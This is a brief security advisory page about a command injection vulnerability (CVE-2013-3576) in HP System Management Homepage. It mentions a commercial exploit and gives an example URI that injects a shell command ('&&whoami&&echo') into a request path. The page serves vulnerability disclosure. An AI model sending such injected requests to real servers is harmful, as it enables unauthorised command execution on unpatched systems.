HP System Management Homepage CVE-2013-3576 Command Injection Vulnerability

An attacker can exploit this issue using a web browser.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product.

The following exploit and example URI are available:

https://www.example.com/smhutil/snmpchp/&&whoami&&echo


 

Privacy Statement
Copyright 2010, SecurityFocus